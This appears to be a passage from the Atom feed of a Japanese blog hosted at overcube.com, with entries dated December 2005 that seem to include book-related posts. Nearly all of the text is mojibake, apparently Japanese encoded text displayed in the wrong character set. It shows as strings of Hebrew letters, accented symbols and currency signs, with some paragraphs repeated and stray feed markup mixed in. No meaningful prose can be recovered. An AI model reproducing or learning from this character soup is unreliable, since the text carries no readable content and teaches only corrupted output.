»׀»ץ»ב₪ֿ₪ׂ₪ָ₪ך₪־ּ¾ֱ°₪ַ₪ֿ₪₪¯¡¢¥¨¡¼¥¸¥§¥ף¥ָ₪ֻֽ¿₪¨₪י₪ל₪¿₪ן₪¶₪־ֱם¾־₪ַ₪¢₪כ₪«₪י₪ְ¡£ ְט½µ¡¢·¯₪־±»ץ₪־µֽ₪ב×₪¬₪ֿ₪÷₪ל₪¿₪־₪ֿ¡¢¥¢¥¥כ¥¬¥א₪־ֵ´¶־ּ₪¬¸÷₪י₪µ₪ל₪ֶ₪₪₪¿₪«₪י₪ְ¡£ ·ײ¸קֵפ₪¬ֱֶֽ³₪ִ₪«₪₪¯₪₪ֳ₪ֶ°ֵ₪₪ּכ₪ע²ב₪´₪·₪¿·׀¸³₪¬₪¢₪כ₪¢₪₪¿¡£₪½₪ל₪ֿ»ה¡¢»׀»ץ»ב₪ֻ₪ט₪ֳ₪ֶ¡¢¹½ֲ₪·׳»»½ס₪¬½ס₪­´¹₪¨₪י₪ל₪¿₪¿₪ב¡£ ₪₪ְ₪₪ְ₪¢₪כ¡£ ֳ¦ְ‏»צ¸־₪־¸¶°ר₪ָ₪µ₪ל₪כֵ´ֶ»²ס¼ׂ₪־¡ײ¹½ֲ₪¾ו₪־ּהֲך¡׳¡£ ֽ¿ֲֵח¾¡ֽר₪ע»₪¨₪כ¿·¿ֽµִ°ק₪־¡ײֵ´¶¡₪¹₪¸₪¬₪ֽ¡ֻ¡׳₪עָ´₪₪₪ֶ₪×₪₪₪¿₪־₪ג¡¢»׀»ץ₪־»ֵ¶ָ¡£ ÷£ַ¯÷ַ₪ג²װ₪₪₪ְ¥¿¥ל¥ף¥ָ¡¢₪₪־₪ָ£ָ£ַ¡£₪ָ₪ג₪ֻ¹ר₪־¡ײֵ´¶־ּ¡׳₪ֻּהֲך₪¬₪¢₪כ¡£¿ֵּ£µ°¾ו₪־ֳֿ¿ּ₪¬ֽט₪ל₪׀¡¢¹ר÷ױ₪±₪כ₪ְ₪ם₪¦¡£ ¿¿±₪ֿ₪₪¼¥ױ¥£¥®¥ו¥¢ֲוֹ½₪ֻ₪₪ל₪₪₪¡£ ÷£÷¢₪ֻ₪₪ֳ₪ֶָ¯³׀₪¹₪כ¥¢¥¹¥¥¹¥ָ²ׂ¡£÷£÷¢₪ֻ₪₪ֳ₪ֶ²ף¼‎₪µ₪ל₪כֲח¼ךֵֵµ¡¥ב¡¼¥«¡¼₪־¥ױ¥¡¥ף¥ׂ¡¼¥¿¡¼¡£»צ·ן₪ֻ₪₪כ₪₪ַ¡ײµ¶ֱץ¡׳₪ֿ¸«ָ´₪±₪₪₪¡£ ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֱִֻך³°₪־¾ו¾÷₪ע¸«₪»₪כ³פ²ֱ¡£ ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֻ¥¥¹¥ָ¥»¥י¡¼₪ֻ₪₪כֻ¡¢ַה₪ל₪כ¾¦ֹ¡£ ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֶֻ´₪ל₪־¥»¥ל¥ײְ¸³ט¡£ °ֲ₪¹₪®₪כ¥¥ף¥·¥ח¥ף₪ָ»ק₪ֶ₪ֿ₪₪₪₪₪₪«¡£ ֵ´¶₪ֿ₪ֱ₪ד₪ף₪ֶָ‏₪ֳ₪ֶ₪₪₪כ₪־₪«¡£²ֱֳֽ₪־¹½ֲ₪·׳»»₪ֿµ¶ֱץ₪µ₪ל₪ֶ₪₪₪₪«¡£ ִֽ½ק»¦¿ֽ₪¬ֿ¢ֲ³₪·₪ֶµ¯₪³₪ֳ₪¿₪ָ₪­¡¢₪ױ₪ָֹװ°ֲ₪ֻ₪₪כֶֻ₪־¹½ֲ₪¾ו₪־·ח´¡¢ֵ´¶־ּ₪־ֹװֲ­¡ִ¡£ ¥¥₪¥¥¹£±µי¥י¥₪¥»¥ף¥¹₪ע¼טְֶ₪¹₪כֶֻ¿ֽ₪ֿ₪₪₪¿₪כ₪ָ₪³₪ם₪ֱַ‎₪¨₪ֶ₪₪₪כ¡£¥ג¥י¥כ¥ֿ¥¶¡¼¥ֹ¡£ַה₪ל₪ל₪׀₪ט₪·¡£ ₪₪₪ה¡¢ַה₪י₪₪±₪ל₪׀¡¢²¿₪ג₪ֹ₪¦₪·₪ט₪¦₪ג₪₪₪₪ַ₪ֿ₪₪₪₪«¡£ְ¸₪­₪כ₪³₪ָ₪ַֿה₪כ₪³₪ָ₪ְ¡£ ¥­¥₪גֳ־₪י₪₪₪₪¦₪ֱ₪ֻ¡¢»׀»ץ»ב₪ָ₪₪ֳ₪ֶ₪₪₪כ₪«₪ג₪·₪ל₪₪₪¡£... - - overQ - - - - book - - ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢ֱ°₪־µ­»צ₪־ֲ³₪­¡£ֽטַ¯₪־¥¥¹¥ָֻ¡¢£²°ּ₪ָ£±°ּ₪ַ₪¹¡£

    - -

    ÷£ַ¯₪־¥¨¥ף¥ָ¥ך₪ֿ₪³₪ל₪ַ₪×₪·₪₪₪¡£
    -÷עַ¯₪ֻ°ת₪­ֲ³₪­¡¢÷£ַ¯₪ג¥ײ¥ם¥°₪עִּ₪¸₪ֶ¡¢₪₪₪ם₪ף₪‎₪ָ½׀²ס₪₪¡¢ֽ·₪ף₪ַ₪₪₪¿₪ְ₪₪₪ֶ¡¢₪ָ₪ֶ₪ג³₪·₪«₪ֳ₪¿₪ַ₪¹¡£₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪·₪¿¡£
    -₪₪¿¡¢ֽטַ¯₪ג₪ט₪ם₪·₪¯₪×´ך₪₪₪·₪₪¹¡ש

    - -


    -ֲט£²°ּ¡¡¡ײ»׀»ץֳµִו»צּ³½ך¡¥¥₪¥¥¹£±µי₪ֿ»¦₪·₪־¥י¥₪¥»¥ף¥¹¡׳

    - -

    »ה₪ֿ»׀»ץ»ב¡£
    -¥¥₪¥¥¹£±µי¥י¥₪¥»¥ף¥¹₪ע₪ג₪ִ¡¢µ¶ֲ₪₪־¥¨¡¼¥¸¥§¥ף¥ָ₪ְ¡£

    - -

    »ה₪־µ¶ֲ₪₪ֿ¡¢₪½₪¦¥«¥ף¥¿¥ף₪ֻ₪ֿ¸«ָ´₪±₪₪₪¡£¥¥ף¥·¥ח¥ף¡¦¥¥ֶ¥כ₪־µ¶ֲ₪₪₪ֹ¡¢₪₪ְ₪₪ְ½ר₪־¸‎¡£
    -»ה₪־¼ך₪¬₪±₪¿µ¶ֲ₪₪ֿ₪₪₪¿₪כ₪ָ₪³₪ם₪ֻµ₪ײ¡£

    - -

    »׀»ץ»ב₪ֿ₪ׂ₪ָ₪ך₪־ּ¾ֱ°₪ַ₪ֿ₪₪¯¡¢¥¨¡¼¥¸¥§¥ף¥ָ₪ֻֽ¿₪¨₪י₪ל₪¿₪ן₪¶₪־ֱם¾־₪ַ₪¢₪כ₪«₪י₪ְ¡£

    - -

    ְט½µ¡¢·¯₪־±»ץ₪־µֽ₪ב×₪¬₪ֿ₪÷₪ל₪¿₪־₪ֿ¡¢¥¢¥¥כ¥¬¥א₪־ֵ´¶־ּ₪¬¸÷₪י₪µ₪ל₪ֶ₪₪₪¿₪«₪י₪ְ¡£
    -·ײ¸קֵפ₪¬ֱֶֽ³₪ִ₪«₪₪¯₪₪ֳ₪ֶ°ֵ₪₪ּכ₪ע²ב₪´₪·₪¿·׀¸³₪¬₪¢₪כ₪¢₪₪¿¡£₪½₪ל₪ֿ»ה¡¢»׀»ץ»ב₪ֻ₪ט₪ֳ₪ֶ¡¢¹½ֲ₪·׳»»½ס₪¬½ס₪­´¹₪¨₪י₪ל₪¿₪¿₪ב¡£

    - -

    ₪₪ְ₪₪ְ₪¢₪כ¡£

    - -

    ֳ¦ְ‏»צ¸־₪־¸¶°ר₪ָ₪µ₪ל₪כֵ´ֶ»²ס¼ׂ₪־¡ײ¹½ֲ₪¾ו₪־ּהֲך¡׳¡£
    -ֽ¿ֲֵח¾¡ֽר₪ע»₪¨₪כ¿·¿ֽµִ°ק₪־¡ײֵ´¶¡₪¹₪¸₪¬₪ֽ¡ֻ¡׳₪עָ´₪₪₪ֶ₪×₪₪₪¿₪־₪ג¡¢»׀»ץ₪־»ֵ¶ָ¡£

    - -

    ÷£ַ¯÷ַ₪ג²װ₪₪₪ְ¥¿¥ל¥ף¥ָ¡¢₪₪־₪ָ£ָ£ַ¡£₪ָ₪ג₪ֻ¹ר₪־¡ײֵ´¶־ּ¡׳₪ֻּהֲך₪¬₪¢₪כ¡£¿ֵּ£µ°¾ו₪־ֳֿ¿ּ₪¬ֽט₪ל₪׀¡¢¹ר÷ױ₪±₪כ₪ְ₪ם₪¦¡£
    -¿¿±₪ֿ₪₪¼¥ױ¥£¥®¥ו¥¢ֲוֹ½₪ֻ₪₪ל₪₪₪¡£
    -÷£÷¢₪ֻ₪₪ֳ₪ֶָ¯³׀₪¹₪כ¥¢¥¹¥¥¹¥ָ²ׂ¡£÷£÷¢₪ֻ₪₪ֳ₪ֶ²ף¼‎₪µ₪ל₪כֲח¼ךֵֵµ¡¥ב¡¼¥«¡¼₪־¥ױ¥¡¥ף¥ׂ¡¼¥¿¡¼¡£»צ·ן₪ֻ₪₪כ₪₪ַ¡ײµ¶ֱץ¡׳₪ֿ¸«ָ´₪±₪₪₪¡£

    - -

    ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֱִֻך³°₪־¾ו¾÷₪ע¸«₪»₪כ³פ²ֱ¡£
    -ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֻ¥¥¹¥ָ¥»¥י¡¼₪ֻ₪₪כֻ¡¢ַה₪ל₪כ¾¦ֹ¡£
    -ֳז¿ָ₪ֿ²¿₪גׁ₪ן₪ֳ₪ֶ₪₪₪₪־₪ֶֻ´₪ל₪־¥»¥ל¥ײְ¸³ט¡£
    -°ֲ₪¹₪®₪כ¥¥ף¥·¥ח¥ף₪ָ»ק₪ֶ₪ֿ₪₪₪₪₪₪«¡£
    -ֵ´¶₪ֿ₪ֱ₪ד₪ף₪ֶָ‏₪ֳ₪ֶ₪₪₪כ₪־₪«¡£²ֱֳֽ₪־¹½ֲ₪·׳»»₪ֿµ¶ֱץ₪µ₪ל₪ֶ₪₪₪₪«¡£

    - -

    ִֽ½ק»¦¿ֽ₪¬ֿ¢ֲ³₪·₪ֶµ¯₪³₪ֳ₪¿₪ָ₪­¡¢₪ױ₪ָֹװ°ֲ₪ֻ₪₪כֶֻ₪־¹½ֲ₪¾ו₪־·ח´¡¢ֵ´¶־ּ₪־ֹװֲ­¡ִ¡£

    - -

    ¥¥₪¥¥¹£±µי¥י¥₪¥»¥ף¥¹₪ע¼טְֶ₪¹₪כֶֻ¿ֽ₪ֿ₪₪₪¿₪כ₪ָ₪³₪ם₪ֱַ‎₪¨₪ֶ₪₪₪כ¡£¥ג¥י¥כ¥ֿ¥¶¡¼¥ֹ¡£ַה₪ל₪ל₪׀₪ט₪·¡£
    -₪₪₪ה¡¢ַה₪י₪₪±₪ל₪׀¡¢²¿₪ג₪ֹ₪¦₪·₪ט₪¦₪ג₪₪₪₪ַ₪ֿ₪₪₪₪«¡£ְ¸₪­₪כ₪³₪ָ₪ַֿה₪כ₪³₪ָ₪ְ¡£
    -¥­¥₪גֳ־₪י₪₪₪₪¦₪ֱ₪ֻ¡¢»׀»ץ»ב₪ָ₪₪ֳ₪ֶ₪₪₪כ₪«₪ג₪·₪ל₪₪₪¡£
    -

    ]]> - ֲט£±°ּ¡¡¡ײ¸ח¶ץ¡׳

    - -

    ¶ץ₪ע¸ח₪כ₪ָ½ס₪₪₪ֶ¡¢¸ח¶ץ¡£
    -ֲ¹¸ח¶ץ₪ֿ¡¢·׀ֵµ₪־¿ֽ¡¦¸¼װש»°ֲ¢₪־ִן»ׂ¡£»°ֲ¢ֻ¡»ױ₪ֿ¼ב²א₪־ִן»ׂ₪ַ₪¢₪ֳ₪ֶ¡¢¸ח¶ץ₪ֿ°ג₪ן₪׀¡¢¼ב²א₪־ֲ¹ִן»ׂ¡£

    - -

    »°ֲ¢ֻ¡»ױ₪ֿ¡¢·׀ֵµ₪×₪¿₪¯¡£ֻ₪־ֳז₪ֻ¿¿¼ֲ₪¬½ס₪«₪ל₪ֶ₪₪₪כ₪ָ¿®₪¸₪כ₪¢₪₪ך¡¢ְ₪³¦₪ג¸½¼ֲ₪גֻ₪־²ע¼ב₪ַ₪·₪«ֽ‎²ע₪·₪₪₪¡£
    -ְ₪³¦₪ָ₪ֿ¡¢¥¢¡¼¥י¥ה¼±₪ָ₪₪₪¦µנֲח₪½ס×₪־¾ו₪ֻ₪ִ₪₪₪¿ְק₪₪ע¡¢₪₪ֱ₪¬₪ֳ₪ֶֶֹ²ע₪·₪¿·כ²ּ¡¢ְ¸₪¸₪כ¡¢₪ָ₪־₪¿₪₪¦¡£
    -ּ₪־ֱ°₪ֻ¶ל₪·₪א¿ֽ₪¬₪₪₪ֶ₪ג¡¢·׀ֵµ₪־ֳז₪־²¿₪¬₪·₪־½׀ֽט»צ₪ֻ¥ׁ¥י¥ױ¥ל¡¼¥÷₪¹₪כ₪³₪ָ₪¬½׀ֽט₪₪±₪ל₪׀¡¢₪₪כ₪ַּ₪ֶֻ‏₪י₪₪«₪ֳ₪¿₪«₪־₪ט₪¦₪ֻּµ»כ₪¹₪כ¡£

    - -

    ₪½₪ף₪»‏¡¢³טּצ₪¹₪כ₪־₪¬¡¢¥´¥¯¥¦₪י¡¢¸ז¶¡₪־₪ג₪־₪¿₪ֱ¡£

    - -

    ₪½₪־₪ׂ₪ָ₪ך₪ֿ¡¢¥ֿ¥ֳ¥«¥₪¡£ַע₪₪²רס£
    -ָא₪ג₪₪¿¡¢ְ₪³¦₪־ֲ¸÷₪עַ§₪ב₪₪₪¡£¥ֿ¥ֳ¥«¥₪¼°₪־ּהֲך²ע·טֻ¡₪ֿ¡¢₪₪₪¿₪ֳ₪ֳֶ±½ד¡£ּהֲך₪ע¡¢¶פ₪ֳ₪ֶ₪·₪₪¦¡£²ע·ט₪¹₪כ₪־₪ַ₪ֿ₪₪¯¡¢¾ֳַּ₪µ₪»₪כ¡£
    -¡ײ₪×½ץ₪±₪¯₪ְ₪µ₪₪¡×¡׳¡ײ₪ט₪¦₪·¡¢¶פ₪ֳ₪ֶ₪ה₪ם₪¦¡׳
    -ּהֲך₪¬ֲ¸÷₪·₪₪¯₪₪ל₪׀¡¢ֵת₪¨₪כֹ¬ֽ׳₪ג₪₪₪₪ן₪±₪ְ¡£

    - -

    ¥´¥¸¥ח¡¼¡£
    -¥´¥¸¥ח¡¼₪ֿ¡¢ֲװ₪ִ¡£₪ׂ₪¿₪¹₪יֲװ₪ִ¡£ֲװ₪ֳ₪ֲֶװ₪ֳ₪ֲֶװ₪ֱֲ³₪±₪כ¡£¥´¥¸¥ח¡¼ֲװ₪ֱ¡£ֲ¾°¦₪־₪₪₪»¨ֳּ₪־ּ¾¼ך₪ַ₪ג₪¢₪כ¡£
    -¡ײ₪×½ץ₪±²¼₪µ₪₪₪₪»¡×¡׳¡ײ₪ט₪ם₪·₪₪¡£ֲװ₪ִ₪¬₪ט₪₪¡£ֵת₪¨₪ֿ₪½₪־₪־₪ֱ¡¢₪µ₪÷₪«₪כ₪ְ₪ם₪¦¡£₪ָ₪³₪ם₪ַ¡¢¥­¥¡¢₪ג₪ה₪₪·כ₪׃₪־»ֵ‎₪ֻ₪ִ₪₪₪ֶ¡¢ֳ־₪ֳ₪ֶ₪₪₪כ₪«₪ֽ¡¢₪ג₪ה₪₪₪ָ₪₪₪¦₪־₪ֿ¡ִ¡׳
    -₪³₪¦₪·₪ֶ¡¢ֲװ₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪µ₪¨ֻ÷₪ל₪¬₪ֱ₪₪₪ֹ¡¢»¨ֳּ₪עּ₪·₪א₪¬¡¢»‏¡¹¡¢ּהֲך₪־₪³₪ָ₪ע»׳₪₪½׀₪·¡¢ֵת₪¨₪ֿ₪₪₪ִֽט₪כ₪־₪ְ₪ם₪¦₪ָ¡¢₪µ₪₪·₪₪₪ט₪¦₪¡¢₪₪־ְּ₪כ₪₪₪ט₪¦₪µ₪¬₪ֻ₪₪כ₪־₪ְ₪ֳ₪¿¡£
    -ְִּ₪־ֳז₪ֱֻױ₪ַ₪י₪ל₪¿²»³₪־¡¢ּֽֽֿ₪ֳָֿ₪¬ָ¿ֵ¾₪·₪ֶ¡¢ְִּ₪¬²»³₪־₪ט₪¦₪ֻ¹₪³₪¨₪ֶ₪¯₪כ₪«₪־₪ט₪¦₪ֻ¡£

    - -

    ₪½₪·₪ֶ¡¢¥´¥¯¥¦¡£
    -¥´¥¯¥¦₪ֿ¡¢₪«₪ִ₪ֶ¡¢»°ֲ¢₪ָ½׀²ס₪¦ֱ°¡¢¼ב²א₪ֻ²ס₪ֳ₪¿₪³₪ָ₪¬₪¢₪כ¡£
    -¸¼װש»°ֲ¢₪µ₪¨¡¢₪¸₪ִ₪ֿ·׀ֵµ₪־ֳז₪ַ₪·₪«½׀²ס₪ֳ₪¿₪³₪ָ₪־₪₪₪¼ב²א¡£¥´¥¯¥¦₪¬₪«₪ִ₪ֶ¼ב²א₪ֻ₪₪₪¨₪¿₪³₪ָ₪־₪¢₪כ₪³₪ָ₪ע¡¢»°ֲ¢₪ֿ₪¦₪¹₪¦₪¹µ₪₪ֵ₪₪₪ֶ₪₪₪כ¡£÷¬₪ֻ»‎₪ֳ₪ֶ₪₪₪כ¡¢₪ָ₪₪₪ֳ₪ֶ₪₪₪₪¡£₪½₪ל₪ַ¡¢²¿₪«₪ָ¥´¥¯¥¦₪ֻ₪ֿ־ה₪¿₪¯ֵצ₪¿₪כ₪־₪ְ¡£
    -₪·₪«₪·¡¢¥´¥¯¥¦₪ֿ¡¢₪½₪ל₪ֿ°­₪₪₪³₪ָ₪ַ₪ֿ₪₪₪¡¢₪ָ¹ֽ₪¨₪¿¡£ֻ₪ֻ½ס₪«₪ל₪ֶ₪₪₪₪³₪ָ₪ע¡¢₪×»ױ¾¢ֽֽ₪¬ֲ־¸³₪¹₪כ»ו¸‎₪ֻ₪₪ך₪ֿ₪·₪₪₪₪«₪ָ»׳₪ֳ₪¿₪«₪י¡£
    -½ס×₪־³°₪ֻ»°ֲ¢₪עֿ¢₪ל½׀₪¹₪³₪ָ¡¢₪½₪ל₪¬ֲ¹¸ח¶ץ₪־ָב´ך¡בָא´₪ַ₪¢₪כ¡£

    - -

    ¥´¥¯¥¦₪¬¼ב²א₪ֻ²ס₪ֳ₪¿₪־₪ֿ¡¢¥´¥¯¥¦₪¬ְ₪³¦₪־³°₪ָֻפ₪׃½׀₪½₪¦₪ָ₪·₪¿»‏₪־₪³₪ָ¡£
    -¼ב²א₪¬÷מ₪ֳ₪¿₪³₪־ְ₪³¦₪־³°ֹפ₪ֻ½׀₪¿₪₪₪ָ¹ֽ₪¨₪¿¡£¼«¬₪ֿ¼«¬₪ְַ¸₪­₪ֶ₪₪₪¯¡£ֲ¾־ֿ₪־¾ו₪ֻ°ֲ½»₪¹₪כ₪₪ֹ¡¢¿¿₪ֳ¿₪´₪ב₪ף¡£₪½₪ל₪₪י₪₪₪ֳ₪½¡¢»א₪ע₪¨₪י₪ײ₪ֽ¡£
    -₪½₪·₪ֶ¡¢¥·¥ד¥«₪־¼ך₪־¿₪«₪י½׀₪ט₪¦₪ָ₪·₪¿¥´¥¯¥¦₪ֿ¡¢₪¿₪ְ₪½₪־¾ו₪ַֽ·₪ײ₪³₪ָ₪·₪«µצ₪µ₪ל₪₪₪¼«¬₪עֳ־₪כ¡£¼ך₪־¿₪ִֿ₪¸₪ֶ₪×₪ך¡¢₪½₪־³°₪ֿ₪₪₪¡£

    - -

    ₪·₪«₪·¡¢¥´¥¯¥¦₪ֿ³°₪ֻ½׀₪כ₪³₪ָ₪ע¡¢₪¢₪­₪י₪ב₪¿₪ן₪±₪ַ₪ֿ₪₪«₪ֳ₪¿¡£ְן־¬₪עׁ₪¨₪¿₪־₪ְ¡£
    -ֵ·¼³₪ֻ₪₪₪¯¡£ְ₪³¦₪־ֳז¿´¡£₪½₪³₪ְַ₪³¦₪ָ»‏´ײ₪¬ְ¸₪½׀₪µ₪ל₪ֶ₪₪₪כ₪ָ¸ְ₪¦¾ל½ך¡£±¿ּ¿₪ע₪ֿ₪«₪ך₪´₪ָ₪¹₪כֳז¿´¡£ָכּ©₪עֳ־₪כ₪־₪ְ¡£

    - -

    ₪·₪«₪·¡¢¥µ¥ף¥¾¡¼₪ָ־¹₪¹₪כ₪ֻ₪ִ₪ל¡¢ֹװ°ֲ₪ֻ₪₪כ¡£
    -ֵ·¼³₪ֿ₪¢₪כ₪־₪ְ₪ם₪¦₪«¡£
    -¼«¬₪¿₪ֱ°ל¹װ₪ֿ¡¢₪¸₪ִ₪ֿ₪₪₪₪ְִ¹°ֲ₪«₪י³°₪ֻ½׀₪ֶ₪₪₪₪₪₪־₪ַ₪ֿ₪₪₪₪«¡£

    - -

    ₪¢₪כּכ₪ֻ₪ֿ¡¢¥´¥¯¥¦₪ֿ¥µ¥ף¥¾¡¼₪־ֶµ­₪עֵנ₪ֶֹ₪₪·₪ֶ¡¢¼«¬₪¬₪¸₪ִ₪ֶֿµ­₪ֻ½ס₪«₪ל₪¿₪ג₪־₪ֻ²ב₪®₪₪₪₪־₪ַ₪ֿ₪₪₪₪«¡¢₪ָµ¿₪¦¡£
    -ֶµ­₪ֻ¼«¬₪¿₪ֱ₪־₪³₪ָ₪¬½ס₪«₪ל₪ֶ₪₪₪כ₪־₪ֿ¡¢ֹװ»׳µִ₪ַ₪ֿ₪₪₪¡£₪·₪«₪·¡¢¥µ¥ף¥¾¡¼₪ֿ¡¢ֶµ­₪עֶ¡¹₪־½׀ֽט»צ₪ָ₪·₪ֶ₪ַ₪ֿ₪₪¯¡¢³°¹ס¸ל₪ַ½ס₪«₪ל₪¿·׀ֵµ₪־ֻּץ₪ָ₪·₪ֶ½ס₪₪₪ֶ₪₪₪כ¡£
    -³°¹ס¸ל₪־ֶֹ₪ב₪₪₪¥´¥¯¥¦₪ֻ₪ֿ¡¢»ז₪־¾ו₪־ְק₪₪ֻ₪·₪«¸«₪¨₪₪₪ּֽֽֿ₪«₪י¡¢¥µ¥ף¥¾¡¼₪ֿ¸ְֽױ₪עֶֹ₪¼ט₪כ₪־₪ְ¡£

    - -

    ₪₪¿ּ₪ּכ₪ֻ₪ֿ¡¢¥´¥¯¥¦₪ֿ¡¢ַׁ»₪־ֳֿ²¼₪ֻ¡¢µנֲח₪·׀ֵµ¹©¾ל₪עָ¯¸«₪¹₪כ¡£
    -₪½₪³₪ַ₪ֿ¡¢¥µ¥ף¥¾¡¼₪½₪ֳ₪¯₪ך₪־ֳֻ₪¿₪ֱ₪¬ּכ₪ּכ₪¡¢ֲִֻח₪·׀ֵµ₪עֻּץ¡¦½׀ַָ₪·ֲ³₪±₪ֶ₪₪₪כ¡£
    -¸µ₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪־₪ֿ¡¢ְֲ¸ֵ₪־°לֻח₪־´הָ׳₪ַ¡¢¥«¥׃₪¬ְ¸₪¨¡¢ֳמ₪¬ַח₪₪¡¢±«₪·₪₪ַ°ֽֽ₪ּֽֽֿ₪¬¹ן₪₪ל₪ֶ₪₪₪כ¡£
    -ֳֻ₪¿₪ֱ₪ֿ₪½₪ל₪ע¸¶ֵµ₪ָ¸ֶ₪׃ָש÷₪ֻ¸¦µז₪¹₪כ¡£₪½₪·₪ֶ¡¢ּµ¿פ₪־¸»ת₪עֶֹ₪¼ט₪ֳ₪ֶ₪ֿ¡¢₪₪₪¯₪ִ₪ג₪־²ע¼ב₪עװֲ₪¡¢ֻּץ₪ָ¾־₪·₪ֶ¡¢ּµ¿פ₪־·׀ֵµ₪ע½׀ַָ₪·ֲ³₪±₪כ¡£
    -·׀ֵµ₪×₪¿₪־¥µ¥ף¥¾¡¼₪ֿ¡¢₪₪ף₪₪ָ₪ְ₪₪µ₪ל¡¢₪³₪³₪¬ֵ·¼³₪ְ₪ָ»׳₪₪¹‏₪א₪¬¡¢¥´¥¯¥¦₪ֿ₪ִ₪₪₪ֻ´הָ׳₪עַֻ²ץ₪¹₪כ¡£
    -ַֻׂ₪ע½¦₪₪½¸₪ב₪כ¥µ¥ף¥¾¡¼¡£
    -ֵ·¼³₪ֿ¸«¼÷₪ן₪ל₪¿¡¢₪ָ₪₪₪ֳ₪ֶ¡¢¥µ¥ף¥¾¡¼₪ֿ־¹₪־ֵּ×₪ע¡¢ְ₪³¦ֳז₪ָֻפ»¶₪·₪¿ַֻׂ₪־÷־½¸₪ֻׁ₪¨₪ֶ₪·₪₪¦¡£

    - -

    ֵ·¼³₪ע¼¨₪¹ּµ¿פ₪־ֶ»₪·₪כ₪¡£
    -₪·₪«₪·¡¢ֵ·¼³₪ֿ¸«₪ִ₪«₪י₪₪₪¡£ֵ·¼³₪ֿ¡¢¥µ¥ף¥¾¡¼₪־ֱּׁ₪ְ₪ֳ₪¿₪־₪«¡£₪½₪·₪ֶ¡¢₪½₪־ֱּׁ₪ג¡¢÷£₪ֿ¾ֳַּ₪·₪ֶ₪₪₪כ₪־₪ְ₪ֳ₪¿¡£
    -¸¼װש»°ֲ¢₪־ֱ°₪ֻ₪ג¡¢ּµ¿פ₪־»°ֲ¢₪¬₪₪₪ֶ¡¢ָא₪י₪¬ֵ·¼³₪ֻ₪×₪ג₪א₪­¡¢¡ײ·׀ֵµ¡׳₪ָ¸ֶ₪׀₪ל₪כְ₪³¦₪־ָכּ©₪־ֳַׂ₪ע¡¢₪³₪־ְ₪₪ֻ₪ג₪¿₪י₪·₪¿¡£
    -₪½₪ל₪ֿ¡¢ֵ·¼³₪ֻ₪¢₪כ³°¹ס¸ל₪־¸¶ֵµ₪ֻ´נ₪ֵ₪¯ֻּץ₪ָ₪µ₪ל₪כ₪¬¡¢ֵ·¼³₪ֿ¼÷₪ן₪ל¡¢₪ג₪¦¸¶ֵµ₪ֿ₪₪₪₪ָ₪ג₪₪₪ן₪ל₪כ¡£
    -ֻּץ₪ְ₪±₪¬»ִ₪כ₪¬¡¢₪¸₪ִ₪ֿ½י₪ב₪«₪י¸¶ֵµ₪₪ֹ₪₪«₪ֳ₪¿₪־₪ַ₪ֿ₪₪₪₪«¡£

    - -

    ִ₪¸₪י₪ל₪¿¼ב²א₪־¼ך₪־¿₪־ֳז₪־ז«₪ְ¡£ֳז¿´₪־·חַ¡¡£₪ֹ₪³₪ֻ₪גֳז¿´₪¬₪₪¯¡¢₪ֹ₪³₪גֳז¿´₪ַ₪¢₪כ¡£₪½₪ל₪ֵֿת₪¨₪ַ₪ֿ₪₪¯¡¢ּהֲך₪־¾ֳַּ₪ְ¡£
    -ִ½ך¶²ֹ₪ֻ₪×₪ֱ₪₪₪כ¥´¥¯¥¦¡£

    - -

    ²ּ₪¿₪·₪ֶ¡¢ֲ¹¸ח¶ץ₪ֿ¡¢¼ך₪־¿₪־³°₪ֻ½׀₪כ₪³₪ָ₪¬₪ַ₪­₪כ₪־₪«¡£
    -ָ¬²₪־¶ץ¢₪ֻֿ‏₪¿₪µ₪ל₪כ₪«¡£¸ח¾פ₪־ֲװ₪ֱ₪₪¦₪±₪ֿ³נ₪¨₪י₪ל₪כ₪־₪«¡£
    -₪½₪·₪ֶ¡¢»°ֲ¢ֻ¡»ױ₪ֵֿ·¼³₪ֻ₪¿₪ֹ₪ךֳו₪±₪כ₪־₪«¡£

    - -

    ֲ³₪­₪ֿ£²£°£°£¶ַ¯¡¢¶ו½½¶וּכ₪ַ¡£

    ]]> -
    -
    - - £²£°£°£¶ַ¯¡²ֽ¶ץ¡ֻ¥¥¹¥ָֻ¡¦₪½₪־£± - - 2005-12-31T06:44:20Z - 2005-12-31T15:44:20+09:00 - tag:www.overcube.com,2005:/blog//2.679 - 2005-12-31T06:44:20Z - ₪¿₪יֻ£±£¹₪־ֶף₪ִּ₪־₪×ֲך₪ֿ¡¢¡ײ£²£°£°£µַ¯₪־¥¥¹¥ָֻ¡׳₪ַ₪·₪¿¡£₪³₪ֱ₪י₪ֻ₪ג₪×ֵת₪¨₪·₪¿₪¯₪ֶ¡¢₪₪₪ם₪₪₪ם¹ֽ₪¨₪ֶ₪ֿ₪₪¿₪־₪ַ₪¹¡£₪¬¡£ ₪·₪«₪·¡¢¹ֽ₪¨₪ע₪ב₪°₪י₪¹₪¦₪ֱ¡¢ִ¾¶ב₪־₪³₪ָ₪·₪«»׳₪₪½׀₪»₪₪₪»ה₪¬¡¢₪½₪³₪ֻ₪ֿ₪₪₪¿₪־₪ַ₪¢₪ֳ₪¿¡£ ₪³₪³10ֶ₪¯₪י₪₪₪ֶַֹ₪ף₪ְ¥¥¹¥ָֻ₪·₪«₪ן₪«₪י₪ף₪ַ₪¹¡£¡₪ֱ₪₪₪ֻ¡¢₪½₪ל₪ֿ¥ל¥א¡ײֵ·₪־ְ¼¡¦¸ֱֿנַ®¡׳¡ֻ¡£ ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢ֽטַ¯₪ְ¡££²£°£°£¶ַ¯₪־¥¥¹¥ָֻ₪ע¸₪ִ₪׀₪«₪ך¡£ 